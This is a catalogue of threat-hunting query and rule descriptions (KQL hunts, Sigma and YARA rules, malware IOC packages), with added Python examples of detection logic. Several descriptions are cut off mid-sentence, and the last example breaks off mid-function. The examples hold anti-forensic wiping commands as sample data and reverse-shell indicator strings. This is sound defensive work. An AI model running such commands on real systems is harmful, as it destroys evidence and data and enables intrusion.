Microsoft has observed attackers exploiting vulnerabilities associated with Log4J.
This query was originally published in the threat analytics report, Sysrv botnet evolution. Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptoc
Aria SBox 2
Look for Base64 table
BigDig bpInit
BigDig mpModExp
BigDig mpModInv
BigDig mpModMult
BigDig mpModulo
BigDig spModExpB
BigDig spModInv
BigDig spModMult
Look for 128-bit key Chacha stream cipher constant
Look for 256-bit key Chacha stream cipher constant
CryptoPP ApplyFunction
CryptoPP Integer constructor
CryptoPP RsaFunction
Look for DCP Blowfish EncryptCBC
Look for DCP Blowfish Init
Look for DCP Des EncryptECB
Look for DCP Des Init
Look for DCP RijnDael EncryptECB
Look for DCP RijnDael Init
Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities that mainly proliferates through search engine optimization
Look for Compare string function
Look for Copy function
Look for DecodeDate (DecodeDateFully) function
Look for Form.Show function
Look for IntToStr function
Look for Random function
Look for RandomRange function
Look for StrToInt function
Microsoft has observed threat actors exploiting vulnerabilities associated with Log4J.
Prior to deploying Macaw ransomware in an organization, the adversary disables controlled folder access on all protected folders, which allows them to be encrypted once the ransomware payload is deployed.
DoppelPaymer in-memory malware implant. This query identifies processes whose command-line launch strings match the pattern used in DoppelPaymer ransomware attacks.
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_dragonfly.yml. Questions via Twitter: @janvonkirchheim.
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_elise.yml. Questions via Twitter: @janvonkirchheim.
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_equationgroup_c2.yml. Questions via Twitter: @janvonkirchheim.
Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities that mainly proliferates through search engine optimization
This query searches for a string pattern detected in evasive PowerShell usage. Jupyter or SolarMarker will iterate on this pattern multiple times to read data and call additional processes. This query
Use this query to find Excel launching anomalous processes congruent with Qakbot payloads which contain additional markers from recent Qakbot executions. The presence of such anomalous processes indic
FGint RsaSign
Use this query to find attempts to access files in the local path containing Outlook emails.
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_hurricane_panda.yml. Questions via Twitter: @janvonkirchheim.
The following query can locate activity possibly associated with the EUROPIUM threat actor
This query looks for Microsoft Defender Antivirus detections related to EUROPIUM actor
This query looks for identities added through Exchange PowerShell.
Directly prior to deploying Macaw ransomware in an organization, the attacker will run several commands designed to disable security tools and system recovery tools.
Prior to deploying Macaw ransomware in an organization, the adversary will disable several tools and functions in order to inhibit later recovery efforts.
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_judgement_panda_gtr19.yml. Questions via Twitter: @janvonkirchheim.
'This query looks for Microsoft Defender Antivirus detections with the family names used by KNOTWEED'
'This query identifies modifications to COM registry keys to point to executable files in C:\Windows\System32\spool\drivers\color\'
'This query identifies matches based on domain IOCs related to KNOTWEED against Microsoft Defender for Endpoint device network connections'
'This query looks for new files being downloaded using Curl.'
'This query identifies matches based on KNOTWEED file hash IOCs across Microsoft Defender for Endpoint tables'
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi
LockBox DecryptRsaEx
LockBox EncryptRsaEx
LockBox RsaEncryptFile
LockBox TlbRsaKey
Backdoor processes associated with the OceanLotus Mac malware backdoor. Reference: https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/. OS platform
Backdoor processes associated with the OceanLotus Mac malware backdoor dropper. Reference: https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/. OS
Prior to deploying Macaw ransomware in an organization, adversaries will change the password for hundreds or thousands of accounts in order to lock users out of the network and impede recovery effort
Miracl Big constructor
Miracl mirsys init
Miracl mirvar
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_oceanlotus_registry.yml. Questions via Twitter: @janvonkirchheim.
OpenSSL BN_mod_exp_inverse
OpenSSL BN_mod_exp_mont
OpenSSL BN_mod_exp_recp
OpenSSL BN_mod_exp_simple
OpenSSL BN_mod_exp2_mont
YARA rule: OpenSSL_DSA
YARA rule: pkcs8_private_key_information_syntax_standard
Prior to deploying Macaw ransomware in an organization, adversaries will use Attrib to display file attribute information on multiple drives and all subfolders.
Qakbot operators have been abusing the Craigslist messaging system to send malicious emails. These emails contain non-clickable links to malicious domains impersonating Craigslist, which the user is i
Use this query to find email-stealing activities run by Qakbot, which uses "ping.exe -t 127.0.0.1" to obfuscate subsequent actions. Email theft that occurs might be exfiltrated to operators and indi
Use this query to find reconnaissance and beaconing activities after code injection occurs. Reconnaissance commands are consistent with the current version of Qakbot and occur automatically to exfiltr
Find use of Alternate Data Streams (ADS) for anti-forensic purposes (Alternate Data Stream execution).
Adversaries are likely attempting to delete backup files in healthcare environments to eliminate recovery options
Look for cipher.exe deleting data from multiple drives. This is often performed as an anti-forensic measure prior to encryption.
Look for attempts to use fsutil.exe to delete file system logs that can be used as forensic artifacts.
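The two entries above describe command-line patterns rather than a procedure, so here is an added example of the same detection logic run over constructed process-creation events; it is not the page's own query. It assumes each event carries the PE original filename (as Defender's ProcessVersionInfoOriginalFileName field does), so a renamed copy of cipher.exe is still matched, and relies on the documented cipher.exe /W: and fsutil usn deletejournal syntax. Hosts and command lines are constructed.

```python
import re
from collections import defaultdict

# Constructed process-creation events: (host, PE original filename, command line).
# Not real telemetry. The last event is a renamed copy of cipher.exe, which an
# image-path match would miss but the original-filename field still catches.
PROCESS_EVENTS = [
    ("ws01", "cipher.exe", "cipher.exe /w:C:\\"),
    ("ws01", "cipher.exe", "cipher.exe /w:D:\\"),
    ("ws01", "fsutil.exe", "fsutil usn deletejournal /D C:"),
    ("ws02", "cipher.exe", "cipher /e /s:C:\\Users\\alice\\Documents"),  # EFS encrypt, benign
    ("ws02", "fsutil.exe", "fsutil fsinfo drives"),                     # benign enumeration
    ("ws03", "cipher.exe", "C:\\Temp\\svchost.exe /W:E:\\"),
]

# cipher.exe /W:<dir> overwrites free space on the volume holding <dir>;
# the drive letter is the only part the detection needs.
WIPE_FLAG = re.compile(r"(?:^|\s)/w:\s*([a-z]):", re.IGNORECASE)
# fsutil usn deletejournal removes the NTFS change journal, a common forensic source.
USN_DELETE = re.compile(r"\busn\b.*\bdeletejournal\b", re.IGNORECASE)


def cipher_wipes(events, min_drives=2):
    """Hosts where cipher.exe wiped free space on at least min_drives volumes.
    Returns {host: sorted drive letters}."""
    drives = defaultdict(set)
    for host, orig_name, cmdline in events:
        if orig_name.lower() != "cipher.exe":
            continue
        match = WIPE_FLAG.search(cmdline)
        if match:
            drives[host].add(match.group(1).upper())
    return {h: sorted(d) for h, d in drives.items() if len(d) >= min_drives}


def usn_journal_deletions(events):
    """(host, command line) pairs where fsutil deleted the USN journal."""
    return [(host, cmdline) for host, orig_name, cmdline in events
            if orig_name.lower() == "fsutil.exe" and USN_DELETE.search(cmdline)]


if __name__ == "__main__":
    print("multi-drive wipes:", cipher_wipes(PROCESS_EVENTS))
    print("single-drive wipes included:", cipher_wipes(PROCESS_EVENTS, min_drives=1))
    print("USN journal deletions:", usn_journal_deletions(PROCESS_EVENTS))
```

Matching on the original filename rather than the image path is what makes the ws03 event visible; the min_drives threshold mirrors the "multiple drives" condition in the entry, and lowering it to 1 trades precision for recall.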
Identify accounts that have logged on to affected endpoints. Check for specific alerts.
Find distinct evasion and execution activities associated with the RobbinHood ransomware campaign.
Find attempts to stop System Restore and prevent the system from creating restore points.
Locate vulnerable Gigabyte drivers used by RobbinHood ransomware to turn off security tools.
RijnDael AES
RijnDael AES (check2) [char]
RijnDael AES S-inv [char]
RsaEuro NN_modInv
RsaEuro NN_modMult
RsaRef2 NN_modExp
RsaRef2 NN_modInv
RsaRef2 NN_modMult
RsaRef2 RsaPrivateDecrypt
RsaRef2 RsaPrivateEncrypt
RsaRef2 RsaPublicDecrypt
RsaRef2 RsaPublicEncrypt
'This query identifies matches based on domain IOCs related to Star Blizzard against Microsoft Defender for Endpoint device network connections'
StrRAT is a Java-based remote access tool that steals browser credentials, logs keystrokes and takes remote control of infected systems. It also has a module to download additional payloads onto the
Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities that mainly proliferates through search engine optimization
Microsoft has observed attackers who have gained entry to an environment via the Log4J vulnerability utilizing identifiable strings in PowerShell commands.
Attackers may use unconventional PowerShell curl flags
Microsoft has observed attackers who have gained entry to an environment via the Log4J vulnerability utilizing the ws_TomcatService.exe process to launch malicious processes.
Hunt package for 95 IOCs associated with ClearFake
Hunt package for 3 IOCs associated with KongTuke
Hunt package for 8 IOCs associated with SmartApeSG
Hunt package for 100 IOCs associated with Unknown malware
Hunt package for 5 IOCs associated with Unknown RAT
Hunt package for 3 IOCs associated with Amadey
Hunt package for 6 IOCs associated with Cobalt Strike
Hunt package for 2 IOCs associated with Lumma Stealer
Hunt package for 5 IOCs associated with Nanocore RAT
Hunt package for 9 IOCs associated with Remcos
The Stealc malware is a data exfiltration tool designed to steal sensitive information such as credentials and system data from infected hosts. It typically arrives via phishing emails or malicious websites containing malicious URLs that download and execute the payload. SOC analysts should monitor for unusual outbound traffic patterns, unexpected data transfers, and signs of lateral movement or command-and-control communication beyond the identified URLs.
Hunt package for 2 IOCs associated with ValleyRAT
Hunt package for 4 IOCs associated with Vidar
Look for Random function
Hunt package for 17 malicious URLs tagged as 32-bit
Hunt package for 8 malicious URLs tagged as arm
Hunt package for 51 malicious URLs tagged as ClearFake
Hunt package for 18 malicious URLs tagged as elf
Hunt package for 3 malicious URLs tagged as malware_download
Hunt package for 4 malicious URLs tagged as mirai
Hunt package for 2 malicious URLs tagged as Mozi
Hunt package for 12 malicious URLs tagged as ua-wget
Prior to deploying Macaw ransomware in an organization, the adversary frequently uses MSBuild.exe as a LOLBin to communicate with the C2.
YARA rule: x509_public_key_infrastructure_cert
This query will hunt for files matching the current abuse.ch recent threat feed based on Sha256. Currently the query is set up to analyze the last day worth of events, but this is configurable using t
Sample query that searches for .settingcontent-ms files downloaded from the web through Microsoft Edge, Internet Explorer, Google Chrome, Mozilla Firefox or Microsoft Outlook. For questions @Mila
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_babyshark.yml. Questions via Twitter: @janvonkirchheim.
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_apt29_thinktanks.yml. Questions via Twitter: @janvonkirchheim.
Bazacall malware uses emails that contain a phone number for the user to call in order to cancel a fake subscription. These emails contain no links or attachments, and use automatic payment lures to t
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_bear_activity_gtr19.yml. Questions via Twitter: @janvonkirchheim.
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_cloudhopper.yml. Questions via Twitter: @janvonkirchheim.
Microsoft has observed Bazacall using Cobalt Strike in order to move laterally to other machines on the network.
DES [long]
DES [pbox] [long]
DES [sbox]
This is a query to retrieve last 30 days network connections to known Dofoil NameCoin servers. The full article is available here: https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-d
BazaCall is a campaign that manipulates users into calling a customer support center, where they are instructed to download an Excel file to unsubscribe from a phony service. When the user opens the Ex
Bazacall uses malicious macro-enabled Excel documents to execute their payload.
FGint Base256StringToGInt
FGint ConvertBase256StringToHexString
FGint ConvertBase256to64
FGint ConvertHexStringToBase256String
FGint DSAPrimeSearch
FGint DSASign
FGint DSAVerify
FGint ECAddPoints
FGint ECElGamalEncrypt
FGint ECPointDestroy
FGint ECPointKMultiple
FGint FGIntToBase256String
FGint FindPrimeGoodCurveAndPoint
FGint PGPConvertBase256to64
FGint RsaDecrypt
FGint RSAEncrypt
FGint RSAVerify
Bazacall uses malicious Excel files to execute payloads on affected devices.
Microsoft has observed compromises related to Bazacall resulting in theft of the Active Directory database using ntdsutil.exe.
Microsoft has observed Bazacall using a renamed version of Rclone for data exfiltration.
During the chain of events from Bazacall to Bazaloader, RunDLL makes several network connections, including to command and control (C2) infrastructure. The command line for these connections contains
The "Stolen Images" Bazarloader campaign uses fake copyright infringement contact form emails and malicious files pretending to contain "stolen images" to trick users into downloading the malware.
Hunt package for 103 IOCs associated with ClearFake
Hunt package for 7 IOCs associated with KongTuke
Hunt package for 6 IOCs associated with Unknown malware
Hunt package for 2 IOCs associated with Lumma Stealer
Hunt package for 6 IOCs associated with Nanocore RAT
Quasar RAT is
StrelaStealer is a credential-stealing malware that exfiltrates sensitive data, including passwords and browser cookies, by establishing covert communication with command-and-control servers. It typically arrives via phishing emails containing malicious links or compromised websites that deploy the malware through exploit kits or malicious attachments. SOC analysts should monitor for lateral movement indicators, unusual outbound traffic patterns
Hunt package for 16 IOCs associated with Vidar
Hunt package for 47 malicious URLs tagged as 32-bit
ClearFake is a malware family that primarily functions as a data exfiltration tool, leveraging command-and-control (C2) communication to
Hunt package for 3 malicious URLs tagged as malware_download
The Mozi malware family is a downloader that establishes command-and-control (C2) communication to exfiltrate data and deploy additional payloads. It typically arrives via phishing emails or malicious websites leveraging
In the campaign where Bazarloader is delivered via emails containing password-protected zip attachments, regsvr32.exe is used to launch a malicious payload that is disguised as a JPG file.
The password-protected zip attachment -> Word document delivery method of Bazarloader uses Word to create an .hta file and launch it via MSHTA to connect to a malicious domain and pull down the Bazarloader p
This query offers daily categorization of ASR rules, helping SOC analysts monitor specific categories like office-related activities or WMI among the 16 rules. It aids in tracking detection rates and
'Under specific circumstances, executing KQL queries can exfiltrate information like access tokens, regarding external data functions like adx(). This query tries to list executed KQL queries that use
'This hunting query looks for increases in the number of workspaces queried by a user.'
CryptoPP a_exp_b_mod_c
CryptoPP modulo
FGint Base10StringToGInt
FGint FGIntDivMod
FGint FGIntDestroy
FGint FGIntModExp
FGint MontgomeryModExp
FGint MulByInt
'This hunting query identifies GitHub activities where it is the first time a user has deleted a repo, which may be a sign of compromise.'
'This hunting query identifies Accounts that are new or inactive and have accessed or used GitHub that may be a sign of compromise.'
'This hunting query identifies GitHub activities where there are a large number of deletions that may be a sign of compromise.'
'This hunting query identifies GitHub OAuth Apps that have restrictions disabled, which may be a sign of compromise. Attackers will want to disable such security controls in order to go undetected.'
'Attackers can exfiltrate data from your GitHub repository by cloning it. This hunting query tracks clone activities for each repository, allowing quick identification of anomalies/excessive clones to
Adversaries may exploit GitHub's public access to exfiltrate sensitive data or distribute malicious code by converting private repositories to public, leveraging the platform's visibility for covert operations. SOC teams should proactively
'This hunting query identifies GitHub activities where permissions are updated that may be a sign of compromise.'
'This hunting query identifies Accounts in GitHub that have granted access to another account which then grants access to yet another account that may be a sign of compromise.'
Looks for MD5 API
Look for MD5 constants
Miracl crt
Miracl powmod
'This hunting query looks for users who are running multiple queries that return either a very large amount of data or the maximum amount allowed by the query method.'
'This hunting query looks for clients running queries that have not previously been seen running queries.'
'This hunting query looks for new Service Principals running queries that have not previously been seen running queries.'
'This hunting query looks for users who have run queries calling a watchlist template relating to sensitive data that have not previously been seen calling these watchlists.'
'This hunting query looks for users who have run queries that have not previously been seen running queries.'
'This hunting query looks for anomalously large LA queries by users.'
'This hunting query looks for queries that appear to be looking for secrets or passwords in tables.'
The RC6_Constants rule detects binaries containing RC6 encryption constants, which may indicate malicious activity leveraging the RC6 cipher.
Look for RIPEMD-160 constants
Look for SHA1 constants
Look for SHA2/BLAKE2/Argon2 IVs
Look for SHA384/SHA512 constants
Look for TEA Encryption
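The constant-matching rules on this page (the MD5, SHA1, SHA2/BLAKE2/Argon2, SHA384/512, RIPEMD-160, RC6, TEA, Blowfish and CRC32 entries) all work the same way: they look for well-known 32-bit values in a binary. This added example is not part of any rule set on the page; it shows that search in Python together with the overlap a practitioner has to handle, because MD4, MD5, SHA-1 and RIPEMD-160 share their initial state, and TEA's delta is also the RC5/RC6 Q32 constant. The constants are the published ones; the sample buffer and signature names are constructed.

```python
import struct
import zlib

# Published 32-bit constants that the constant-matching rules key on. Several
# families share values, so a raw hit is evidence, not an identification.
SIGNATURES = {
    "md4/md5/sha1/ripemd160 IV": (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476),
    "sha1/ripemd160 H4": (0xC3D2E1F0,),
    "sha1 round K": (0x5A827999, 0x6ED9EBA1, 0x8F1BBCDC, 0xCA62C1D6),
    "sha256 IV": (0x6A09E667, 0xBB67AE85, 0x3C6EF372, 0xA54FF53A,
                  0x510E527F, 0x9B05688C, 0x1F83D9AB, 0x5BE0CD19),
    "golden ratio (TEA delta, RC5/RC6 Q32)": (0x9E3779B9,),
    "rc5/rc6 P32": (0xB7E15163,),
    "blowfish P-array start (pi)": (0x243F6A88, 0x85A308D3),
}
ENDIANS = ("<", ">")     # little-endian x86 data/immediates, big-endian for other layouts
CRC32_POLY = 0xEDB88320  # reflected polynomial used by zlib/PKZIP


def crc32_table(poly=CRC32_POLY):
    """Derive the 256-entry reflected CRC-32 table; a table rule matches the
    first entries of exactly this sequence."""
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ poly if c & 1 else c >> 1
        table.append(c)
    return table


def crc32_table_is_consistent():
    """Cross-check the derived table against zlib: the one-byte CRC-32 of 0x00
    is table[255] ^ 0xFF000000 after the final XOR."""
    return zlib.crc32(b"\x00") == (crc32_table()[255] ^ 0xFF000000)


def find_bytes(buf, needle):
    """All offsets of needle in buf, unaligned like a YARA byte pattern."""
    offsets, pos = [], buf.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = buf.find(needle, pos + 1)
    return offsets


def find_u32(buf, value, endian):
    return find_bytes(buf, struct.pack(endian + "I", value))


def find_contiguous(buf, values, endian):
    """Offsets where values sit back to back (a table or IV block), which is
    stronger evidence than the same values scattered as immediates."""
    return find_bytes(buf, b"".join(struct.pack(endian + "I", v) for v in values))


def scan(buf):
    """Map each signature to the endiannesses in which all of its constants occur."""
    hits = {}
    for name, values in SIGNATURES.items():
        for endian in ENDIANS:
            if all(find_u32(buf, v, endian) for v in values):
                hits.setdefault(name, set()).add(endian)
    for endian in ENDIANS:
        if find_contiguous(buf, crc32_table()[:8], endian):
            hits.setdefault("crc32 table", set()).add(endian)
    return hits


def classify_hash(hits):
    """Resolve the shared IVs into the narrowest family the evidence supports."""
    if "sha256 IV" in hits:
        return "SHA-256"
    if "md4/md5/sha1/ripemd160 IV" not in hits:
        return None
    if "sha1/ripemd160 H4" not in hits:
        return "MD4 or MD5"
    return "SHA-1" if "sha1 round K" in hits else "SHA-1 or RIPEMD-160"


# Constructed sample "binary": SHA-1 state and round constants, a CRC-32 table
# prefix and a TEA/RC6 golden-ratio immediate, all little-endian, between
# filler that contains none of the signature values.
FILLER = bytes(range(256))
SAMPLE = (FILLER
          + struct.pack("<5I", 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0)
          + FILLER
          + struct.pack("<4I", 0x5A827999, 0x6ED9EBA1, 0x8F1BBCDC, 0xCA62C1D6)
          + FILLER
          + struct.pack("<8I", *crc32_table()[:8])
          + struct.pack("<I", 0x9E3779B9)
          + FILLER)

if __name__ == "__main__":
    found = scan(SAMPLE)
    for name, endians in found.items():
        print(f"{name}: {sorted(endians)}")
    print("hash family:", classify_hash(found))
```

The four-value IV hit on its own only says "an MD4/MD5-family state was found"; the fifth word and the SHA-1 round constants are what separate SHA-1 from RIPEMD-160, and a 0x9E3779B9 hit needs P32 (or TEA's shift-and-add structure) before it is attributed to either cipher family.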
Hunt package for 3 IOCs associated with Kimwolf
The Mirai malware family compromises IoT devices by exploiting default credentials and weak security configurations, turning them into bots for large-scale DDoS attacks. It typically arrives via network exploitation, leveraging un
Hunt package for 77 IOCs associated with ClearFake
Hunt package for 2 IOCs associated with FAKEUPDATES
The KongTuke malware is a data exfiltration tool that establishes
Hunt package for 36 IOCs associated with Unknown malware
The Havoc malware family is designed for data exfiltration and persistence, often leveraging encrypted communication channels to steal sensitive
Hunt package for 20 IOCs associated with Lumma Stealer
Hunt package for 7 IOCs associated with Quasar RAT
StrelaStealer is a credential-stealing malware that exfiltrates sensitive data such as usernames,
Hunt package for 3 IOCs associated with ValleyRAT
Vidar is a data exfiltration malware
The "32-bit" malware
Hunt package for 38 malicious URLs tagged as ClearFake
Hunt package for 3 malicious URLs tagged as malware_download
Hunt package for 9 malicious URLs tagged as Mozi
'This hunting query looks for users whose total returned data that is significantly above their average.'
'This hunting query looks for users who have multiple failed queries in a short space of time.'
Look for WhirlPool constants
'Threat actors can use JPEG files to hide malware, or other malicious code from inspection. This query looks for the downloading of abnormally large JPEG files from a source where large JPEG files hav
Looks for advapi API functions
'This query look for users starting an Azure CloudShell session and summarizes the Azure Activity from that user account during that timeframe (by default 1 hour). This can be used to help identify ab
'This hunting query will identify where a file is uploaded to Azure File or Blob storage and is then accessed once before being deleted. This activity may be indicative of exfiltration activity.'
'This hunting query will try to identify instances where a file is uploaded to file storage and then deleted within a given threshold. By default the query will find instances where a file is uploaded
'Looks for file uploads actions to Azure File and Blob Storage from known VPS provider network ranges. This is not an exhaustive list of VPS provider ranges but covers some of the most prevalent provi
'Detect mass file deletion events within Azure File and Blob storage. deleteWindow controls the period of time the deletions must occur in, whilst the deleteThreshold controls how many files must be d
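The three storage queries above (upload, single access, delete; upload then delete within a threshold; mass deletion inside a deleteWindow/deleteThreshold) share one shape: group blob operations by blob or caller and test timing. This added example, written here and not the page's KQL, runs that logic over constructed blob-operation records. It assumes Azure's OperationName values (PutBlob, GetBlob, DeleteBlob); the callers, blob names and the default thresholds are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def ts(text):
    return datetime.fromisoformat(text)


# Constructed blob-operation records (time, caller, OperationName, blob); not
# real StorageBlobLogs rows. OperationName values follow Azure's naming.
EVENTS = [
    (ts("2024-05-01T09:00:00"), "svc-a",  "PutBlob",    "out/dump1.zip"),
    (ts("2024-05-01T09:01:00"), "svc-a",  "GetBlob",    "out/dump1.zip"),
    (ts("2024-05-01T09:02:00"), "svc-a",  "DeleteBlob", "out/dump1.zip"),
    (ts("2024-05-01T09:05:00"), "user-b", "PutBlob",    "reports/q1.pdf"),
    (ts("2024-05-01T09:06:00"), "user-b", "GetBlob",    "reports/q1.pdf"),
    (ts("2024-05-01T10:00:00"), "user-b", "GetBlob",    "reports/q1.pdf"),
] + [
    # 25 deletions by one caller five seconds apart: a mass-deletion burst.
    (ts("2024-05-01T11:00:00") + timedelta(seconds=5 * i), "app-c", "DeleteBlob", f"bak/{i}.vhd")
    for i in range(25)
]


def per_blob_history(events):
    """Chronological (time, caller, op) list per blob."""
    history = defaultdict(list)
    for time, caller, op, blob in sorted(events):
        history[blob].append((time, caller, op))
    return history


def upload_read_once_delete(events, max_age=timedelta(hours=1)):
    """Blobs uploaded, read exactly once and deleted within max_age:
    the staging pattern the upload/access/delete query looks for."""
    flagged = []
    for blob, hist in per_blob_history(events).items():
        ops = [op for _, _, op in hist]
        if ops == ["PutBlob", "GetBlob", "DeleteBlob"] and hist[-1][0] - hist[0][0] <= max_age:
            flagged.append((blob, hist[0][1]))
    return flagged


def upload_then_delete(events, threshold=timedelta(minutes=30)):
    """Blobs deleted within threshold of being uploaded, regardless of reads."""
    flagged = []
    for blob, hist in per_blob_history(events).items():
        puts = [t for t, _, op in hist if op == "PutBlob"]
        dels = [t for t, _, op in hist if op == "DeleteBlob"]
        if any(p <= d <= p + threshold for p in puts for d in dels):
            flagged.append(blob)
    return flagged


def mass_deletions(events, delete_window=timedelta(minutes=5), delete_threshold=20):
    """Callers with at least delete_threshold DeleteBlob calls inside any
    delete_window; returns the peak count per flagged caller."""
    times_by_caller = defaultdict(list)
    for time, caller, op, _ in events:
        if op == "DeleteBlob":
            times_by_caller[caller].append(time)
    flagged = {}
    for caller, times in times_by_caller.items():
        times.sort()
        start = 0
        for end, t_end in enumerate(times):
            while t_end - times[start] > delete_window:  # slide the window forward
                start += 1
            count = end - start + 1
            if count >= delete_threshold:
                flagged[caller] = max(flagged.get(caller, 0), count)
    return flagged


if __name__ == "__main__":
    print("upload/read-once/delete:", upload_read_once_delete(EVENTS))
    print("upload then delete:", upload_then_delete(EVENTS))
    print("mass deletions:", mass_deletions(EVENTS))
```

The sliding window in mass_deletions is the equivalent of the query's deleteWindow/deleteThreshold pair: the window controls how close together the deletions must be, the threshold how many of them it takes; a legitimate cleanup job that deletes the same 25 blobs over an hour would not trip the five-minute default.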
Looks for big numbers 20:sized
Detects 32-bit numeric values that may indicate obfuscation
Looks for big numbers 48:sized
Looks for big numbers 64:sized
Looks for big numbers 128:sized
Looks for big numbers 256:sized
Look for Blowfish constants
'Discover all critical ports from a list having rules like 'Any' for sourceIp, which means they are open to everyone. Critical ports should not be open to everyone and should be filtered.'
'This query looks at the last 14 days for "Consent to application" operation by a user/app which could potentially mean unauthorized access. Additional context is added from AuditLogs based on Corrlea
Look for CRC16 table
Look for CRC32 [poly]
Look for CRC32 table
CRC32 table lookup
Look for CRC32b [poly]
Look for CRC32c (Castagnoli) [poly]
Looks for crypt32 CryptBinaryToStringA function
"This Kusto (KQL) hunting query detects blob-enumeration or file-spraying behaviour in Azure Storage by: - Aggregating requests into time-bound sessions with row_window_session(). - Defining a "us
Look for ElfHash
Look for FlyUtils.CnDES Decrypt ECB function
Look for FlyUtils.CnDES Encrypt ECB function
'This hunting query identifies a user who adds/invites a member to the organization for the first time. This technique can be leveraged by attackers to add stealth account access to the organization.'
'This query will look for events where a guest user was invited but has not accepted/redeemed the invite for an unusually long period. Any invites not redeemed for a long period of time can be misused and
'Detects observed Visual Studio Code (VS Code) extension installation activity on a user's system within the query time range. Note: This query does not return a complete per-user inventory of instal
"This query searches for any action type with high frequency that involves adding, modifying, or removing something in cloud app policies. It sees where the properties are modified such that the old v
'This hunting query looks in Azure Web Application Firewall data to find possible SpringShell Exploitation Attempt (CVE-2022-22965). The Spring Framework is one of the most widely used lightweight op
List of primes [char]
List of primes [long]
'Compares the current day to last 14 days of audits to identify new audit activities. Useful for tracking malicious activity related to user/group additions/removals by Azure Apps and automated approv
'Compares current day to last 14 days of audits to identify new audit activities. Useful for tracking malicious activity related to user/group additions/removals by specific users.'
'Finds instances where a file uploaded to blob or file storage and it is seen on an endpoint by Microsoft Defender XDR.'
Hunt package for 5 IOCs associated with Kimwolf
Hunt package for 112 IOCs associated with ClearFake
Hunt package for 2 IOCs associated with KongTuke
Hunt package for 3 IOCs associated with OtterCookie
Hunt package for 44 IOCs associated with Unknown malware
Hunt package for 3 IOCs associated with Cobalt Strike
Hunt package for 2 IOCs associated with Nanocore RAT
Hunt package for 2 IOCs associated with Remcos
SmartLoader is a multi-stage loader malware that establishes persistence and exfiltrates data by dropping additional payloads and maintaining command-and-control communication
StrelaStealer is a credential-stealing malware that exfiltrates
Vidar is a data exfiltration malware that steals credentials and sensitive information, often using encrypted channels to transmit stolen data to command-and-control servers.
Hunt package for 37 malicious URLs tagged as 32-bit
Hunt package for 24 malicious URLs tagged as ClearFake
Hunt package for 24 malicious URLs tagged as malware_download
Hunt package for 14 malicious URLs tagged as Mozi
'This hunting query will try to identify the user account used to perform a file upload to blob storage. This query can be used to match all file upload events, or filtering can be applied on filename
'Identifies when a new user is granted access and any subsequent audit related activity. This can help you identify rogue or malicious user behavior.'
'Detects when a user has successfully authenticated to another Microsoft Entra ID tenant with an identity in your organization's tenant. Ref: https://docs.microsoft.com/azure/active-directory/fundam
'Identifies accounts that have been added to a PIM managed privileged group'
'Identifies modifications to a user's MFA settings. An attacker could use access to modify MFA settings to bypass MFA requirements or maintain persistence.'
This query shows details about all approved Entra ID Governance Access Packages assignments. The results include the time the request was created and approved along with the justification text provide
'Looks for users retrieving BitLocker keys. Enriches these logs with a summary of alerts associated with the user accessing the keys. Use this query to start looking for anomalous patterns of key retr
'This detection looks for crash dump creation being disabled. Malware can use this to limit reporting; look for suspicious processes setting this registry key.'
Steal IE 7 credential
'breakdown of scripts running in the environment'
'Entropy calculation used to help identify hosts that have a high variety of processes (a high-entropy process list on a given host over time). This helps us identify rare processes on a given ho
'Finds attempts to list users or groups using the built-in Windows 'net' tool '
'This hunting query looks for hosts exporting a mailbox from an on-prem Exchange server, followed by that same host removing the export within a short time window. This pattern has been observed by at
'Invoke-PowerShellTcpOneLine is a PowerShell script to create a simple and small reverse shell. It can be abused by attackers to exfiltrate data. This query looks for command line activity similar to
YARA rule: ldpreload
APC queue tasks migration
This rule checks MySQL database presence
'Looks for Base64-encoded commands associated with the Nishang reverse TCP shell. Ref: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1'
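Both reverse-shell queries (the Invoke-PowerShellTcpOneLine entry above and this Nishang one) depend on seeing through the -EncodedCommand wrapper, since the script body never appears in the command line. The following is an added example, not the page's query: it decodes the Base64-over-UTF-16LE payload the way PowerShell does and counts indicators taken from the public Invoke-PowerShellTcp source (the TCPClient object, GetStream, a Read loop and iex). The command lines, the 192.0.2.10 address, the trimmed shell loop used as a fixture and the indicator threshold are constructed assumptions.

```python
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand, plus -ec.
ENC_FLAG = re.compile(r"-e(?:c|n|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]+)",
                      re.IGNORECASE)

# Fragments of the public Invoke-PowerShellTcp one-liner; none is suspicious
# alone, so the hunt requires several of them in one decoded script.
INDICATORS = {
    "tcpclient": "system.net.sockets.tcpclient",
    "getstream": ".getstream()",
    "read_loop": ".read(",
    "iex":       "iex ",
}


def encode_command(script):
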